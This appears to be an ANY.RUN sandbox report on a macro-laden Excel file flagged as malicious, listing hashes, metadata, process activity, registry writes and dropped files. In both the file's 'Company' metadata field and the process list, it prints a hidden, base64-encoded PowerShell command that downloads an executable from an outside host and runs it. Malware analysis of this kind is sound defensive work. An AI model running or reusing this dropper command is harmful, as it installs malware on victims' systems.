analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

GIB 35 YENI VERGI YAPILANDIRMA.xls

Full analysis: https://app.any.run/tasks/9a7e7f37-8607-4956-bcc7-d0f604d14642
Verdict: Malicious activity
Analysis date: December 06, 2018, 08:43:06
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
Indicators:
MIME: application/vnd.ms-excel
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Author: USER, Last Saved By: USER, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Dec 1 15:39:22 2018, Last Saved Time/Date: Tue Dec 4 19:35:26 2018, Security: 0
MD5:

8BDEDB784DB56F6D97512A7454E3AEC1

SHA1:

C98AE284236FD282A6AA0EA7D184F0754B334C5F

SHA256:

704B56D85CB66B64FD14AEDE440598490301DC12EE57E831B10FBEC02C39A621

SSDEEP:

768:/7ik3hbdlylKsgqopeJBWhZFGkE+cL2NdAJ1NG9MRy/3atNfNfhSigT/WNEI9Qku:jik3hbdlylKsgqopeJBWhZFGkE+cL2N7

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Executes PowerShell scripts

      • EXCEL.EXE (PID: 2672)
    • Unusual execution from Microsoft Office

      • EXCEL.EXE (PID: 2672)
  • SUSPICIOUS

    • Creates files in the user directory

      • poWErsHELl.exE (PID: 3360)
    • Executes application which crashes

      • poWErsHELl.exE (PID: 3360)
  • INFO

    • Reads Microsoft Office registry keys

      • EXCEL.EXE (PID: 2672)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.xls | Microsoft Excel sheet (78.9)

EXIF

FlashPix

CompObjUserType: Microsoft Excel 2003 Worksheet
CompObjUserTypeLen: 31
HeadingPairs:
  • Worksheets
  • 1
TitleOfParts: Sheet1
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 16
Company: poWErsHELl.exE -ex bypAsS -noP -W hiddEN -ec IAAJAAkAKAAJACAAIAAuACgAQwBPAG0ATQBhAG4AZAAgAG4ARQB3AC0ATwBiAEoARQBDAHQAKQAJAAkACQBuAGUAVAAuAFcARQBiAEMAbABpAGUATgB0AAkACQAgACkALgBkAE8AVwBuAGwAbwBhAEQAZgBJAEwAZQAoACAACQAJAB0gaAB0AHQAcAA6AC8ALwB3AHcAdwAuAGYAYQBoAGkAbgB0AGUAcgBuAGEAdABpAG8AbgBhAGwALgBjAG8AbQAvAGsAZQB5AC8AUgBlAG0ANAAuAGUAeABlAB0gIAAgACAALAAJAAkAIAAdICQAZQBOAFYAOgB0AE0AUABcAHMAZABmAGcAaAB0AGYAcgB0AGcAaAAuAGUAeABlAB0gIAAJAAkAKQAgAAkACQA7ACAACQAgAHMAQQBQAFMAIAAgACAAHSAkAGUAbgBWADoAdABtAFAAXABzAGQAZgBnAGgAdABmAHIAdABnAGgALgBlAHgAZQAdIA==
CodePage: Windows Latin 1 (Western European)
Security: None
ModifyDate: 2018:12:04 19:35:26
CreateDate: 2018:12:01 15:39:22
Software: Microsoft Excel
LastModifiedBy: USER
Author: USER
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
34
Monitored processes
3
Malicious processes
1
Suspicious processes
1

Behavior graph

Click at the process to see the details
start excel.exe no specs powershell.exe no specs ntvdm.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2672"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /ddeC:\Program Files\Microsoft Office\Office14\EXCEL.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Excel
Version:
14.0.6024.1000
3360poWErsHELl.exE -ex bypAsS -noP -W hiddEN -ec IAAJAAkAKAAJACAAIAAuACgAQwBPAG0ATQBhAG4AZAAgAG4ARQB3AC0ATwBiAEoARQBDAHQAKQAJAAkACQBuAGUAVAAuAFcARQBiAEMAbABpAGUATgB0AAkACQAgACkALgBkAE8AVwBuAGwAbwBhAEQAZgBJAEwAZQAoACAACQAJAB0gaAB0AHQAcAA6AC8ALwB3AHcAdwAuAGYAYQBoAGkAbgB0AGUAcgBuAGEAdABpAG8AbgBhAGwALgBjAG8AbQAvAGsAZQB5AC8AUgBlAG0ANAAuAGUAeABlAB0gIAAgACAALAAJAAkAIAAdICQAZQBOAFYAOgB0AE0AUABcAHMAZABmAGcAaAB0AGYAcgB0AGcAaAAuAGUAeABlAB0gIAAJAAkAKQAgAAkACQA7ACAACQAgAHMAQQBQAFMAIAAgACAAHSAkAGUAbgBWADoAdABtAFAAXABzAGQAZgBnAGgAdABmAHIAdABnAGgALgBlAHgAZQAdIA==C:\Windows\System32\WindowsPowerShell\v1.0\poWErsHELl.exEEXCEL.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3096"C:\Windows\system32\ntvdm.exe" C:\Windows\system32\ntvdm.exepoWErsHELl.exE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
NTVDM.EXE
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
906
Read events
753
Write events
146
Delete events
7

Modification events

(PID) Process:(2672) EXCEL.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Operation:writeName:rv#
Value:
72762300700A0000010000000000000000000000
(PID) Process:(2672) EXCEL.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1033
Value:
Off
(PID) Process:(2672) EXCEL.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1033
Value:
On
(PID) Process:(2672) EXCEL.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel
Operation:writeName:MTTT
Value:
700A000062007AC13F8DD40100000000
(PID) Process:(2672) EXCEL.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Operation:delete valueName:rv#
Value:
72762300700A0000010000000000000000000000
(PID) Process:(2672) EXCEL.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Operation:delete keyName:
Value:
(PID) Process:(2672) EXCEL.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency
Operation:delete keyName:
Value:
(PID) Process:(2672) EXCEL.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
0
(PID) Process:(2672) EXCEL.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:AutoDetect
Value:
1
(PID) Process:(2672) EXCEL.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\DocumentRecovery\19895B
Operation:writeName:19895B
Value:
04000000700A00004400000043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C004C006F00630061006C005C00540065006D0070005C004700490042002000330035002000590045004E004900200056004500520047004900200059004100500049004C0041004E004400490052004D0041002E0078006C007300000000002200000043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C004C006F00630061006C005C00540065006D0070005C00010000000000000050E31FC33F8DD4015B8919005B89190000000000AC020000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
Executable files
0
Suspicious files
2
Text files
2
Unknown types
1

Dropped files

PID
Process
Filename
Type
2672EXCEL.EXEC:\Users\admin\AppData\Local\Temp\CVR82C3.tmp.cvr
MD5:
SHA256:
3360poWErsHELl.exEC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\V8A9BGZSIZ68AO5ESZH6.temp
MD5:
SHA256:
2672EXCEL.EXEC:\Users\admin\AppData\Local\Temp\VBE\MSForms.exdtlb
MD5:D9B6AE1F244B28C52B766981AE34661F
SHA256:488257EE01E982885C9D1780400EC4224A7647A5A0BD08956B6370B81ACA9D49
3360poWErsHELl.exEC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:901ECDF767744E6BB59CB023757886E3
SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1
3360poWErsHELl.exEC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF198f65.TMPbinary
MD5:901ECDF767744E6BB59CB023757886E3
SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1
3096ntvdm.exeC:\Users\admin\AppData\Local\Temp\scs9235.tmptext
MD5:4C361DEA398F7AEEF49953BDC0AB4A9B
SHA256:06D61C23E6CA59B9DDAD1796ECCC42C032CD8F6F424AF6CFEE5D085D36FF7DFD
3096ntvdm.exeC:\Users\admin\AppData\Local\Temp\scs9224.tmptext
MD5:8CF6DDB5AA59B49F34B967CD46F013B6
SHA256:EE06792197C3E025B84860A72460EAF628C66637685F8C52C5A08A9CC35D376C
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
0
DNS requests
0
Threats
0

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

No data

DNS requests

No data

Threats

No threats detected
No debug info